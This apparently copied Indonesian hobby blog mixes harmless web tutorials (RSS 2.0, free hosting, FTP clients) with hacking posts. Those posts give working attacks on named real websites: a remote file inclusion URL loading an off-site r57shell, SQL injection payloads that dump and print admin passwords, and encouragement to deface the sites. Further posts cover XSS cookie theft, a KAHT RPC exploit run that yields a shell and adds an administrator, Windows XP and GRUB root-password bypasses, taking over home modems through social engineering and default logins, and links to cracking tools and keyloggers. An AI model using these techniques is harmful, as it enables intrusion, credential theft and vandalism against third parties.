Jumat, 03 Oktober 2008

untuk semua

nE bLOg eMAng bajakan banget tapi bkaN b'arti w pemBAjak...

qu hnYA seorAng p[LAjaR yang SDang bLAjhar bLOg dan ini pun tar'a untuyk data pempat penyimpanan


sekali lagi mohon dipahami keyyyszzz

Senin, 28 Juli 2008

Cara Membuat RSS 2.0


Saya akan coba menjelaskan tentang apa itu RSS, cara membuat RSS, serta fungsinya.
RSS adalah salah satu bentuk dari Web Syndication, RSS singkatan dari "Really Simple Syndication", Versi dari RSS: 0.91, 0.92 dan 2.0

Berikut yang akan saya bahas adalah RSS versi 2.0, mengapa??
Karena versi 2.0 adalah versi terbaru dan banyak di pakai.

-- Fungsi dari RSS

Web Syndication adalah sedikit potongan kecil dari content/isi website kita yang kita share dengan website lain. Fungsi dari Web Syndication adalah memberikan Feed kepada website lain yang menggunakan RSS website kita.
Format Web Syndication: RSS, ATOM, RDF.

-- Cara Membuat RSS
Perlu anda ketahui dalam pembuatan RSS ada beberapa Element yang wajib, dan Optional

+ Yang Wajib




















 Element Deskripsi Contoh
title
Sama dengan title dari website anda
Belajar Website | Menbuat Website
link
URL dari title
http://www.ilmuwebsite.com
description
Kalimat yang menjelaskan title
Web Development, Pendidikan Ilmu
Web Website Secara Gratis
dan Bahasa Indonesia



+ Yang tidak Wajib




































































 Element
 Deskripsi Contoh
language Bahasa, jika English maka web kita
di golongkan sbg web English
 en-us
copyright
Copyright untuk content title
Copyright 2007, ilmuwebsite.com
managingEditor
Email dari Editor
black.scorpio.night@gmail.com
webMaster
Email Webmaster
black.scorpio.night@gmail.com
pubDate
tanggal publikasi
Sat, 07 Sep 2002 0:00:01 GMT
lastBuildDate
Waktu terakhir perubahan content
Sat, 07 Sep 2002 9:42:31 GMT
category
kategori
category>Newspapers</category>
generator
generator yg digunakan
MightyInHouse Content System v2.3
docs


cloud


ttl


image
image yang digunakan dlm RSS
yg di izinkan: GIF, JPEG or PNG

textInput


skipHours


skipDays



FireFox dan Opera sangat support dengan RSS.

Berikut sedikit contoh RSS 2.0 dari ilmuwebsite.com, anda bisa mengembangkan sendiri:

-------
<?xml version="1.0"?>
<rss version="2.0">
  <channel>
    <title>RSS 2.0 | Update Artikel Terbaru Dari ilmuwebsite.com</title>
    <link>http://www.ilmuwebsite.com/</link>
    <description>ilmuwebsite.com adalah sebuah organisasi / komunitas yang bergerak dalam pengembangan tehnik pembuatan website. Kami ada untuk membantu teman-teman yang ingin belajar membuat website. Tujuan kami adalah membantu perkembangan website Indonesia</description>
    <language>en-us</language>
    <pubDate>Sat, 31 Mar 2007 12:00:00 GMT</pubDate>
    <lastBuildDate>Sat, 31 Mar 2007 12:00:00 GMT</lastBuildDate>
    <docs>http://blogs.law.harvard.edu/tech/rss</docs>
    <generator>Weblog Editor 2.0</generator>
    <managingEditor>black.scorpio.night@gmail.com</managingEditor>
    <webMaster>black.scorpio.night@gmail.com</webMaster>
   
      <item>
      <title>News | Sedikit penjelasan Web Syndication</title>
      <link>http://www.ilmuwebsite.com/</link>
      <description>
&lt;img src=&quot;TN_psd0171.JPG&quot; align=&quot;right&quot; &gt;
Saya akan sedikit jelaskan tentang Web Syndication Apa itu Web Syndication?? Web Syndication adalah sebagian kecil dari website content yang tersedia untuk website lain Secara umum Web Syndication adalah sedikit potongan content dari website kita dimana content tersebut meliputi materi yang selalu kita update seperti "latest news", "tutorial" atau "forum post"[...]
      </description>
      <guid></guid>
      </item>
   

      <item>
      <title>Kuliah PHP | Penjelasan fungsi include();</title>
      <link>http://www.ilmuwebsite.com/</link>
      <description>
- include()
- include_once()
- require()
Fugnsi di atas berguna untuk menggabungkan file PHP atau bukan PHP kedalam file PHP
+++ include()
sebagai contoh
[...]
       </description>
       </item>
   

      <item>
      <title>PHP Tutorial | Validasi Form dengan PHP</title>
      <link>http://www.ilmuwebsite.com/</link>
      <description>
Anda mau membuat peraturan untuk form-form di website anda??
Seperti:

- Nomor Telephone Harus memakai awalan "0" dan minimum 5 angka
- Email Harus [...]
      </description>
      </item>
   

      <item>
      <title>HTML | Advance CSS</title>
      <link>http://www.ilmuwebsite.com/</link>
      <description>
Di sini saya akan jelaskan bagaimana cara membuat CSS tingkat lanjut
ini adalah lanjutan dari artikel saya yang kemarin yaitu "Sedikit Perkenalan dengan CSS"
[...]
      </description>
      </item>
   

      <item>
      <title>Domain | Domain Gratis | CO.NR</title>
      <link>http://www.ilmuwebsite.com/</link>
      <description>
Teman-teman saya mau informasikan bahwa ada penyedia domain gratis yang lumayan bagus
Salah satunya adalah
[...]
      </description>
      </item>


      <item>
      <title>AwardSpace | Free PHP MySql</title>
      <link>http://www.ilmuwebsite.com/</link>
      <description>
Hari ini saya akan coba membahas free hosting yang bisa dikatakan bagus untuk free
host kelas PHP Mysql
Sebelumnya, saya berterima kasih kepada teman-teman yang telah memberitahukan
bahwa awardspace cocok untuk di bahas
[...]
      </description>
      </item>

      <item>
      <title>Hacking | Sedikit penjelasan mengenai XSS vulnerability</title>
      <link>http://www.ilmuwebsite.com/</link>
      <description>
Apaan sih XSS tuh ?
Mungkin anda yang akrab dengan dunia internet pernah men dengar istilah SQL Injection, XSS atau Cross Site Scripting. 2 kelemahan atau vulnerability pada sebuah website yang kerap kali dimanfaatkan oleh para cracker untuk
[...]
      </description>
      </item>


      <item>
      <title>Linux | Baru !!! Fedora Core 7 Test 2</title>
      <link>http://www.ilmuwebsite.com/</link>
      <description>
Pagi-pagi surfing langsung dapet kabar bagus. Proyek lanjutan RedHat linux yaitu Fedora Core terbaru yakni versi 7 Test ke 2, udah siap di download
[...]
      </description>
      </item>


      <item>
      <title>Jaringan | Sedikit Penjelasan Hardware Jaringan</title>
      <link>http://www.ilmuwebsite.com/</link>
      <description>
]Yup, kali ini saya akan coba jelaskan sedikit gambaran mengenai fungsi dari hardware jaringan yang telah di request. Yakni Router, Switch dan Hub. Langsung aja ke bahasannya
[...]
      </description>
      </item>


</channel>
</rss>

-------

Jika di buka dengan firefox hasilnya seperti ini:


Setelah anda membuat RSS, anda bisa mem-verifikasi ke:
Feed Validator --->> http://www.feedvalidator.org

Ingat RSS harus di update terus, mengikuti perkembangan content website

Article Last Update on 23 Februari 2008
Link Updated
Semua File dapat di download di sini > Cara Membuat RSS 2.0


Sumber dari situs Ilmu Website dalam kategori html dengan judul Cara Membuat RSS 2.0

utorial Ultimate Mendapatkan Website Gratis Full


Selamat siang semuanya, kali ini saya akan coba menunjukkan suatu kombinasi yang efektif, efisien, sempurna dan gratis...
Tutorial ini merupakan rangkuman dan gabungan dari dua tutorial sebelum nya, yaitu domain gratis dan hosting gratis...

Dari hasil riset saya selama 3 hari mengenai perpaduan domain gratis dan hositng gratis, saya menemukan titik temu yang sempurna.

Pertama target riset saya lakukan terhadap dua penyedia domain redirection gratis yaitu uni.cc dan co.cc, setelah saya teliti ternyata mereka berdua menyediakan "modify DNS", ya... "modify DNS" adalah fasilitas untuk mengarahkan DNS domain ke hosting kita, feature ini sangat bagus mengingat penyedia free domain redirection yang lain hanya memberikan redirection biasa seperti domain gratis co.nr atau domain gratis .tk dan hanya sebatas cloaking...(Cloaking tidak efektif dan dibenci google).

Selanjutnya adalah mencari hosting gratisan yang cocok dan bagus, saya mencoba 3 free hosting, sebagai test.., mereka yaitu :

Hosting Gratis:
1. 50webs.com
2. 000webhost
3. Freehostia.com

Test penggabungan co.cc dengan 50webs.com, DNS saya arahkan ke 50webs.com, pihak co.cc ok..!!, tapi setelah saya cek ternyata pihak 50webs.com memberikan "0" addon domain (alias tidak mengizinkan "addon domain", katanya sih harus upgrade ).... Test gagal..

Test penggabungan co.cc dengan 000webhost berjalan lancar hanya dengan beberapa jam saja, domain co.cc sudah konek dengan hosting 000webhost. Begitu juga dengan Freehostia, mereka juga bisa konek.

Caranya co.cc dg 000webhost:
  1. Anda register dulu di uni.cc: https://www.co.cc/regist/regist_account.php?go_url=/my_account/my_account.php
  2. Setelah register anda login, pilih salah satu website anda ex: narutopicture.co.cc
  3. Klik tombol "Set up", lalu masukkan dns1.000webhost.com dalam kotak Name Server1 dan dns2.000webhost.com dalam kotak Name Server2.
  4. Anda register ke 000webhost: http://www.000webhost.com/order.php
  5. Masukkan domain co.cc anda ex: narutopicture.co.cc ke kotak: I want to host my own domain (domain must be registered already).
  6. Lalu anda isi form-form yang lain sesuai dengan data anda, dan submit
  7. Tunggu 24 Jam dan Jadi deh....
Caranya uni.cc dg Freehostia:
  1. Anda register dulu di uni.cc, lalu DNS nya uni.cc arahkan ke Free Hostia (freehostia.com), Name Server-nya ada, lihat saja pada menu Addon Domain
  2. Lalu pada cPanel Free Hostia (freehostia.com) pilih Addon Domain, masukkan domain kamu tadi, ex: ilmuwebsite.uni.cc (tanpa www)
  3. Tunggu 24 Jam dan Jadi deh....
Silahkan coba..Gratis..

Membuat Status YM


Menampilkan status YM (yahoo Messanger) di website kita sangatlah penting, terutama bagi website-website yang bergerak dalam bidang bisnis, gunanya ya sebagai CS (Customer Support), kalau untuk website community ya.. bisa sebagai tempat ngobrol dsb.

Cara membuat status YM di website kita sangatlah mudah sekali kita tinggal lah menambahkan tag HTML berikut:



Dimana: "b_scorpio_ilmuwebsite" adalah ID Yahoo kamu, ID Yahoo dapat diperoleh jika anda mempunyai email di yahoo, jika tidak ... ya segera bikin saja email yahoo..
Ex: jika email yahoo kamu adi_ganteng@yahoo.com, maka ID YM kamu adalah: adi_ganteng

Gimana mudah bukan ?
Artikel ini sudah kami kirimkan pada email2 anda (tentunya jika anda sudah langganan).

Terimakasih :)

Video Youtube di Website Anda

Apakah anda pernah melihat suatu website dengan tambahan video dari youtube? Hmm... terlihat bagus kan? Anda bisa menambahkan nya dengan cara menambahkan script HTML embed video tersebut, caranya?
  1. Anda buka Youtube.com
  2. Search video yang anda inginkan
  3. Setelah itu copy code embed nya
  4. Paste di halaman website anda
Perlu anda ketahui untuk kecepatan akses nya, kalau visitor mengakses video youtube website anda dari warnet, kemungkinan agak lambat.

------
Selamat menikmati :D~~

Beautifull Form dr.emi with CSS

Photobucket


Bijimane bikin form nyang kaga mbosenin ????

nah kali ni kite bakalan bikin form make css style.. cantik dah pokokna :D

Style na si ke gini ajah:

Nah lu bikin dah form na, nysuaiin ama style css diatas:




Komentar gw bwat eloh ! :P (bahasa abg mumet)
















Cepet banged !!!! ??? iye mang cpet bikin na, palagi kalo make dreamweaver, kaga usah ribet ....

ni preview na kalo udah jadi...

Photobucket

Mao coba html na ? klik na disini ...

Nyang mao nDownload disinih ...

Sumbangkan sedikit ilmu lu, bwat kebaikan... kami tunggu di http://dremi.info/forum

Woke ! Met malem mingguan yak :D thanks !

Flash Effect Maker Pro v3.5



Bagi anda seorang tukang webdesigner, tukang animator, tukang webdeveloper, ataupun tukang-tukang yang lain, tidak terkecuali bagi anda yang berprofesi sebagai tukang gali sumur :D yang menginginkan special effect pada tulisan dengan instan, cepat saji. Flash Effect Maker bisa dimanfaatkan untuk hal-hal yang anda butuhkan. Tidak perlu membuat manual effect dengan Macromedia Flash. Semuanya instan.

Flash effect sudah mendukung effect background photo yang anda inginkan.
Bagi anda yang ingin mengunduhnya, bisa didownload langsung dari link dibawah ini.
http://rapidshare.com/files/47196630/fem35.zip

RapidHacker v2.5 Final - Rapidshare Tools

This is the latest for all the free rapidshare users it works good i heard i found it just spreading it around for everyone who needs it. RapidHacker can hack/crack/bypass waiting limit at rapidshare.com

Updated Link : http://www.mediafire.com/?1ggnhfg1q4g
password: redhatperl

Informasi selanjutnya :
http://freemedia.realgage.com/rapidhacker-v25-final-rapidshare-tools.html

Process Explorer v11.04

Kadang, sebuah process dalam task manager susah sekali untuk di matikan. Terlebih lagi process itu adalah virus lokal yang berjalan. Weww :_(.
Microsoft kembali membuat software untuk menangani process nakal yang berjalan pada task manager, Process Explorer. Cukup ampuh dalam meng-kill process sedang running.
Percobaan terakhir, saya gunakan aplikasi ini untuk membunuh virus Tati.exe yang sedang berjalan.

Anda mau mencobanya ? silahkan download disini :
http://download.sysinternals.com/Files/ProcessExplorer.zip

SmartFTP Software FTP Terbaik


Software FTP terbaik adalah SmartFTP
Berdasarkan penelitian kami memang SmartFTP adalah yang terbaik diantara software FTP yang lain
Dari dulu kami menggunakan software ini dan tidak ada masalah, "Easy to Use"

Cara penggunaan :
1. Host: masukkan Host FTP mu. Ex: ftp.websiteku.com
2. Login: masukkan User FTP mu. Ex: doni
3. Password: masukkan Password FTP mu. Ex: 123456
4. Port: 21

Download : http://h1.ripway.com/ilmuwebsite/smartftp_ilmuwebsite.zip

Download FTP FileZilla


Satu lagi FTP yang bagus adalah Filezilla, dia memiliki beberapa keunggulan diantaranya adalah dia dapat melakukan transfer file lebih dari satu secara bersamaan sehingga proses transfer banyak file dapat berjalan dengan cepat, beda dengan FTP yang lain seperti SmartFTP....yang hanya dapat melakukan transfer 1 per 1 file secara bergantian, sehingga membuthkan waktu yang agak lama.

Screenshoot Filezilla

Filezilla

Salah satu kelemahannya Filezilla adalah tidak bisa melakukan copy - paste file seperti yang bisa dilakukan SmartFTP, sehingga kurang praktis, jika ada yang berminat untuk download silahkan masuk ke web resmi nya:

http://filezilla-project.org/download.php

Password Default untuk windows XP

aman sekarang di Indonesia hampir semua pake Windows XP Bajakan. Huehuehueh ...
Tapi kali ini /me nggak akan ngebahas masalah begituan, tapi lebih ke arah teknisnya. Mungkin udah banyak yang tau kalo, untuk setiap komputer baru yang sudah bawaannya terinstall Windows XP, masih ada kerentanan yang masih kita ekploitasi. yaitu ; Password Default. Ayo kita buktikan ...
Ketika windows XP dinyalakan dan kita dihadapkan oleh pilihan login [ welcome screen ]. Jangan dulu pilih salah satu, yang harus dilakukan sebelumnya adalah, menekan ctrl+alt+del sekali saja, tunggu sebentar kemudian tekan ctrl+alt+del sekali lagi. Jreng jreng jreng, kita di hadapkan dengan 2 textbox, yaitu username dan password, usernamenya diisi dengan Administrator sedangkan passwordnya dibiarkan kosong saja. Kemudian tekan enter....
Jreng jreng jreng ... kita sudah login dengan account Administrator. Ya, untuk mengatasi kerentenan ini silahkan ganti passwordnya. start | run | nusrmgr.cpl

Jadi root di linux tanpa password.

Boot Linux tanpa Password
Melalui mode single pada GRUB
=====================================================
Hi, ketemu lagi dengan saya, sikeren Al-k. ;)
Sama seperti sebelum sebelumnya, yaitu artikel mengenai jebol password,
tapi kali ini saya akan menjelaskannya pada Linux.
Mungkin pada artikel yang lain telah di jelaskan bagaimana
cara melakukan login tanpa password dengan bootloader Lilo,
tapi kali ini saya akan menjelaskannya pada bootloader Grub.


Beginilah caranya ...
=====================================


1.) Defaultnya, pas di bootloader grub ada 2 pilihan yaitu Redhat Linux dan DOS.
Pilih, yang Redhat Linux, terus tekan e di keyboard.
Tombol e berguna untuk melakukan edit.

2.) http://h1.ripway.com/alk/grub.png
setelah itu, pilih bagian ke 2 atau 3, disitu tertulis kernel blablablablaba ...
tekan e dikeyboard

3.) Kemudian tambahkan s atau single dibelakangnya, kira kira seperti ini

kernel /boot/vmlinuz-2.6.15-1-686 root=/dev/sda1 ro single

setelah itu Escape.

4.) Masih dalam keadaan memilih kernel, kemudian tekan b di keyboard untuk Boot. anda akan di bawa
pada kedudukan root. Silahkan ketik passwd untuk mengganti password yang baru atau anda bisa
mengedit file /etc/shadow, untuk menghilangkan password pada root.

Jreng jreng jreng ... satu lagi, anda login sebagai administrator tanpa password

Penerapan Bug Pada Flashgamescript v1.5.4

Hallo, ketemu lagi dengan orang ganteng ...
Iseng-iseng mampir di www.milw0rm.com akhirnya dapet satu bug yang cukup bermanfaat, baca aja disini :
http://milw0rm.com/exploits/3360

Gimana cara cari situs untuk jadi targetnya ???
Masuk ke google terus ketik inurl:index.php?func=news

Kalo dapet contoh :

http://www.boredatlunch.com/index.php?func=news

langsung aja ganti jadi :

http://www.boredatlunch.com/index.php?func=http://h1.ripway.com/alk/r57shell.php?

Silahkan jalankan aksi anda !! Mantabh !!

SQL Injection AJ Auction seluruh versi

QL Injection pada Aj Auction untuk seluruh versi.
=======================================================

Lagi-lagi bug baru di temukan, kali ini Al-k akan coba masuk
sebagai admin pada situs yang memiliki bug pada halaman subcat.php

langsung aja buka google-nya ...
masukkan keyword ini inurl:/subcat.php?cate_id=

nah loh, dapet banyak bangett ...
pilih aja salah satunya contoh :

http://www.estoop.it/subcat.php?cate_id=146&view=list&PHPSESSID=27c9b2b6500f2c01c09eda1978d45096

setelah cate_id= di hapus aja kemudian di ganti dengan

-1%20union%20select%200,concat(char(116,117,114,107,101,121,58),user_name,char(116,117,114,107,101,121,112,97,115,115,58),pas

sword),2%20from%20admin/*&view=list

kira kira jadi begini

http://www.estoop.it/subcat.php?cate_id=-1%20union%20select%200,concat(char(116,117,114,107,101,121,58),user_name,char(116,11

7,114,107,101,121,112,97,115,115,58),password),2%20from%20admin/*&view=list


nah loh passwordnya langsung dapet

turkey:adminturkeypass:daniel87

itu artinya
usernamenya admin
passwordnya daniel87


sekarang masuk ke control panelnya

http://www.estoop.it/admin
terus masukkin username dan passwordnya

jreng jreng jreng anda di bawa ke control panel ...

hehehehe ... deface deface ...

SQL Injection pada X-Ice System V-1

Untuk mencari targetnya, silahkan menggunakan keyword yang tepat ...
ex : inurl:/devami.asp?id= geri

Korban yang saya dapatkan adalah :

http://www.radyopinarim.com/haber1/devami.asp?id=1

Untuk membuktikan websitenya vuln atau tidak anda bisa menghapus angka 1-nya.
Yang anda dapatkan adalah kurang lebih error yang seperti ini


Microsoft OLE DB Provider for ODBC Drivers hata '80040e14'

[Microsoft][ODBC Microsoft Access Sürücüsü] 'id=' sorgu ifadesi içindeki Sözdizimi hatasý (eksik iþleç)

/haber1/devami.asp, satýr 8


Dari sini silahkan tepuk tangan, karena anda masih bisa mengeksploitasi situs ini.
Untuk mencari username nya anda tinggal mengganti angka 1 dengan

-1+union+select+0,kullaniciadi,2,3,4,5,6,7+from+admin

kurang lebih alamat di browser seperti ini :
http://www.radyopinarim.com/haber1/devami.asp?id=-1+union+select+0,kullaniciadi,2,3,4,5,6,7+from+admin

Yang saya dapatkan usernamenya adalah Kadrius

dan untuk mencari passwordnya
:


-1+union+select+0,sifre,2,3,4,5,6,7+from+admin

passwordnya adalah 19901990

Untuk login sebagai admin anda tinggal balik kehalaman

/admin/kontrol.asp

Ya, sekian saja tutorial singkat penggunaan SQL Injection sebagai exploitasi bug X-Ice system.
Selamat mencoba, terima kasih.

Sedikit penjelasan mengenai XSS vulnerability

Sedikit penjelasan mengenai XSS vulnerability

Apaan sih XSS tuh ?
Mungkin anda yang akrab dengan dunia internet pernah men dengar istilah SQL Injection, XSS atau Cross Site Scripting. 2 kelemahan atau vulnerability pada sebuah website yang kerap kali dimanfaatkan oleh para cracker untuk menjalankan aksinya. Yang konon katanya, XSS ini juga di temukan oleh Mas Dani [ XNUXER Laboratory ] ketika melakukan pen-test situs KPU.go.id beberapa tahun lalu. XSS pun bisa digunakan untuk mencuri cookies, sehingga seorang cracker bisa menggunakan identitas orang lain dengan menggunakan cookies hasil curian. XSS biasanya digunakan oleh newbie hacker yang tidak memiliki explo untuk menjalankan aksi ilegalnya. :)

Maksudnya apaan sih, nggak ngerti !
Singkat cerita, metode XSS dan SQL Injection digunakan untuk melakukan deface pada sebuah website. Istilah familiarnya "nge-hack website" walaupun pada kenyataannya deface itu tidak sama dengan hacking. Deface sendiri memiliki arti, merusak sebagian atau keseluruhan dari isi website.

Caranya gimana ???
Caranya nggak susah-susah amat, anda hanya perlu menggunakan browser anda untuk memanfaatkan vuln ini. Contoh situs yang masih bisa di XSS adalah :

http://www.malesbanget.com/kamus/definisi.php?kata=

untuk mengetes apakah situsnya masih bisa di XSS anda bisa menambahkan setelah kata=



http://www.malesbanget.com/kamus/definisi.php?kata=

kemudian tekan enter ...
kemudian akan muncul popup baru berisi 'Tes, XSS-nya masih bisa'

Terus ... ???
Masih banyak tag html yang bisa kita gunakan, tanya deh mamang Google. :)

contoh lainnya adalah :

http://www.malesbanget.com/kamus/definisi.php?kata=

Hacked by Me



Cuma gitu doang ???
Iya... segitu dulu aja entar di lanjut lagi. Tunggu aja. :)

Tekhnik Exploit Password WinXP

Kali ini saya akan mencoba untuk menjelaskan 2 teknik exploitasi pada windows XP, pertama melakukan pemanfaatan SAM files dan terakhir memanfaatkan RPC-nya Windows XP. Tekhnik kedua sebetulnya adalah kelanjutan dari artikelnya mRt di echo zine 10 yang membahas tentang Exploitasi Windows XP [pada fat32] dengan memanfaatkan sang Admin sendiri (hehuehuheue ... ) dan batch file yang disisipkan di start|program|startup oleh sang kriminal :), sedangkan kali ini yang saya bahas adalah jenis NTFS, yang tidak memiliki acces seperti pada fat32 untuk dapat menaruh batch file di folder start up nya sang Admin tersayang, sehingga apabila dipaksakan “Access Denied” adalah jawabannya. Apa akibatnya jika kita menggunakan kedua tekhnik diatas ?, yang jelas mah sama-sama buat orang seneng... heuheueehuhuehuee ! Jawab sendiri dah ...

Tekhnik pertama :
Yang kita butuhkan sekarang adalah :
Petter Recovery Password yang bisa di download dari situsnya langsung http://home.eunet.no/~pnordahl/ntpasswd/bootdisk.html sekalian sama infonya aja, biasanya sudah di sediakan dalam bentuk rar yang bisa di jadikan bootdisk. Yang penulis pakai untuk experimen kali ini yaitu versi bd040818 terdapat 3 file di dalamnya yakni bd040818.bin , install.bat , rawrite2.exe .
1 buah disket kosong dan layak pakai. :) --> untuk disket boot Petter Recovery Password.
Nekatzzzz ....

Kasusnya begini, misalnya ....anggap saja kita lupa password untuk login winXP nya. : ) atau kasus yang laen aja kali ya, yang lebih menantang ... hehehe. Misalnya ada rampok yang kebingungan nggak bisa login, padahal kompienya mo dijual ... huehueueheue. Ada yang kesindir nggak nih ??? Udah ah bcanda mulu. Langsung aja deuh ...

Langkah pertama ... Setelah Petter Recovery Password di jadikan bootdisk, langsung saja booting dengan disket tersebut ...
Langkah berikutnya, anda akan di tanya di drive mana SAM file berada. Tekan enter saja untuk defaultnya, setelah itu akan ditanyakan secara spesifik lagi, di direktori mana file SAM berada, biasanya untuk yang defaultnya tuh SAM file berada di /windows/system32/config, enter lagi aja untuk yang defaultnya. Setelah itu ....... Nah sampe disini anda akan di minta User mana yang ingin di ganti/hapus passwordnya. Lebih baik Administrators aja, karena yang kita lakukan saat ini kan mencari cara untuk menjadi SU di Windows XP. Biar gampang melakukan sesuatu nantinya .... hehehehe !!! Untuk eksperiment kali ini lebih baik anda membuat password Administrators menjadi blankpassword [* = blankpassword], supaya gampang nantinya, dan blankpassword merupakan pilihan terbaik dalam menggunakan Petter Password Recovery. Soalnya penulis sendiri telah belasan kali mencoba mengganti password para user dengan tetapi hanya 2 yang berhasil. Sudah ??? ... siiiip, tekan ! untuk mengakhir sesi reset password, dan q untuk mengakhiri scripts tersebut. Selanjutnya anda akan di tanya kembali, ingin mengulang atau tidak. Lebih baik tidak lahhhh ... Edit Completed. Catatan : Setelah menggunakan Petter Recovery Password, Windows berusaha untuk melakukan scandisk, system ne baru di acak-acak nie : ). Tunggu hingga proses scandisk selesai.
Setelah proses booting, anda akan di hadapkan dengan tampilan login yang seperti biasanya. ( Nggak menarik, hehehehe... ) Sekarang tekan ctrl+alt+del, tunggu sebentar dan kemudian tekan kembali ctrl+alt+del. Nah ada tampilan login yang clasic, seperti di windows 98 dulu. Dengan 2 textbox...


-------------------------------------------------
| Log On to Windows | x |
-------------------------------------------------
| User Name : Al-k |
| Password : ****** |
| |
| | Ok | | Cancel | | BLABLABLABLA....| |
-------------------------------------------------

Ya, bentuknya kira-kira seperti diatas ... : )...
Setelah itu ganti usernamenya menjadi Administrator, passwordnya di kosongkan saja, karena sebelumnya kita telah menjadikan blankpassword pada Administrator. Ok. Jreng-jreng-jreng... sekarang anda menjadi super user kembali. Silahkan buat account untuk anda sendiri.

Tekhnik Kedua :
Tiba saatnya kita maju bersama ... :D, memanfaatkan Massive RPC WinXP yang bobrok. Tekhnik kedua ini dibuat untuk para user yang memiliki acces limited. Yang dibuat kesal oleh sang admin, sehingga untuk menginstall suatu software harus minta izin dari sang Admin. :( . Yang dibutuhkan hanyalah acces untuk masuk ke command shell, dan satu tool kecil ‘kaht’ . Siap ???... buka command promptnya ...

C:\Documents and Settings\Al-k>net user

User accounts for \\NOMATTER
-------------------------------------------------------------------------------
Administrator Al-k GNU-- keluarga --
Guest HelpAssistant SUPPORT_388945a0
VUSR_NOMATTER
The command completed successfully.

// Anggap saja disini Al-k adalah user yang limited
// Setelah itu masuk ke direktori di mana kaht berada

D:\Data+ku_>

Kemudian kita test dulu kaht-nya... bisa nggak nih kita nge-root.

  D:\Data+ku_>kaht 127.0.0.0 127.0.0.3
_________________________________________________

KAHT II - MASSIVE RPC EXPLOIT
DCOM RPC exploit. Modified by aT4r@3wdesign.es
#haxorcitos && #localhost @Efnet Ownz you!!!
FULL VERSION? :) - AUTOHACKING
________________________________________________

[+] Targets: 127.0.0.0-127.0.0.3 with 50 Threads
[+] Attacking Port: 135. Remote Shell at port: 34522
[+] Scan In Progress...
- Connecting to 127.0.0.2

Sending Exploit to a [WinXP] Server...
- Conectando con la Shell Remota...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

Tuh kan dapet deh akses rootnya. Jangan seneng dulu. Langsung aja kita
buat akses user yang terbatas tadi menjadi Super User.


C:\WINDOWS\system32> net localgroup Administrators Al-k /add

The command completed successfully.


Selanjutnya anda bisa login dengan user yang baru saja dirubah accountnya tadi. Dan anda bisa login ke account user lain yang memiliki akses sama seperti Administrator, tentunya dengan menghilangkan password user tersebut dulu sebelumnya. Dan anda bisa masuk ke regedit untuk menutup perizinan user account pada control panel :

HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/DisallowCpl/

, buat string baru dengan nama 1 dan ubah valuenya menjadi nusrmgr.cpl
Dan bisa anda disable akses ke command prompt kepada semua user. Sehingga anda menjadi SU yang benar-benar otoriter. Sayangnya tekhnik yang kedua ini hanya bisa di lakukan di Windows XP Service Pack 1. : (

Hacking Modem Speedy dan Penanganannya

Sebenarnya sudah lama sekali telkom mengadakan diskon besar-besaran untuk meraih pelanggan sebanyak-banyaknya. Udah dulu promosinya. :D

Sama dengan bug-bug yang lainnya, konfigurasi default akan membuat pihak luar yang tidak diinginkan seperti cracker dengan mudah mengeksploitasi secara besar-besaran sehingga memanen username dan password menjadi sesuatu yang memungkinkan sekali untuk dilakukan. Contoh bug yang buruk, yaitu username default dan password yang default.

Sebelum ngejabarin masalah teknisnya, berikut alat-alat yang diperlukan :


Browser Internet ( mau yang banyak bugnya, maupun yang sedikit bugnya )

Website dengan log system flat file ( diambil dari artikelnya Anggi J. )

Aplikasi Instant Messaging, ex : Yahoo Messenger ( Social Engineering )

Internet Password Asterisk Reveal

( http://www.nsauditor.com/freeware/downloads/IEAstRecover.exe )


Langkah Pertama

Silahkan anda baca artikel http://www.ilmuwebsite.com/detil_php_tutorial/2/_Membuat_System_LOG_dengan_FLAT_FILE/
, cara memasang log system flat file. Digunakan untuk mendapatkan alamat ip dari sang korban.


Langkah Ke Dua

Inti dari artikel ini adalah pencarian user yang akan dijadikan korban. Anda bisa menggunakan aplikasi IRC ataupun instant messaging yang lainnya. Alangkah baiknya anda menggunakan aplikasi IRC, seperti mIRC ataupun yang lainnya, karena fasilitas whois yang ada didalamnya mempermudah kita untuk segera mengetahui IP sang korban, tapi pada beberapa kasus, adakalanya user yang advanced menggunakan anonymous proxy yang tentunya menyembunyikan IP asli miliknya. Sehingga perlu teknik social engineering yang lebih ampuh lagi. Berikut ada sedikit percakapan antara seseorang sebagai intruder dengan sang korban menggunakan aplikasi yahoo messenger :


Mamang (intruder) : dah liat situs ini belom, ilmuwebsite.com ???

Sang_korban : apaan tuh ?

Mamang (intruder ) : situs keren punya orang keren, ngebahas tentang berbagai artikel mengenai kekerenan. Coba deh liat.

Sang_korban : coba, gw liat dulu. # kena!!

Mamang ) intruder ) : gimana keren kan ? eh, gw off dulu yah. C U


Situs ilmuwebsite.com tersebut, merupakan sebuah contoh situs yang anda gunakan untuk merecord ip sang korban. Anda bisa memasang log system flat file pada situs milik anda. Dengan mengusahakan sang korban tertarik untuk mengunjungi situs yang telah dipasang log system flat file.

Contoh IP yang sudah dilog dalam flat file,

Waktu: Fri, 06 Jul 2007 12:47:04 +0700 | IP asli: 125.161.2.85 | Browser: Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90) | URL: / | Referrer: | Proxy: | Koneksi:

Langkah Ketiga

Setelah mendapatkan alamat ip sang korban, yang perlu anda lakukan adalah membuka browser, kemudian pada address bar isi dengan alamat ip yang telah anda dapatkan, sebagai contoh yang saya dapatkan adalah http://125.160.#.# isikan username dengan admin dan passwordnya admin. Jika anda beruntung, anda akan langsung dihadapkan kepada halaman username ADSL dan tentunya password yang asterisk. Untuk membuka password yang asterisk, anda cukup menggunakan Internet Password Asterisk Reveal.


Penanganan

Sebenarnya dengan mengganti password yang default pun itu sudah bisa mencegah teknik seperti ini. Dan intinya password yang kuatlah yang susah untuk dimanfaatkan. Password yang kuat ini memiliki lebih dari 8 digit, dan merupakan gabungan dari angka huruf dan special character. Ex: ilmVw3851te --> bentuk lain dari ilmuwebsite

Sayangnya, telkom telah menerapkan system yang unique, sehingga account speedy tidak bisa digunakan pada jaringan telepon yang berbeda. Dan tentunya anda tidak bisa men-take over account yang sudah didapatkan. Mohon Maaf, artikel ini hanya sebagai contoh pembelajaran.

Default password untuk setiap modem :

http://www.elitehackers.info/defaultpasslist.php

CD Hacking Tools 2007


CD Hacking Tools ( Mirror was Updated )

XxxPass-Team 2007
Danger Cracking & Hacking Tools - Ver 1.0

- Exploit Collection (4 Tools)
- Google Hacking (4 Tools)
- Keyloggers (5 Tools)
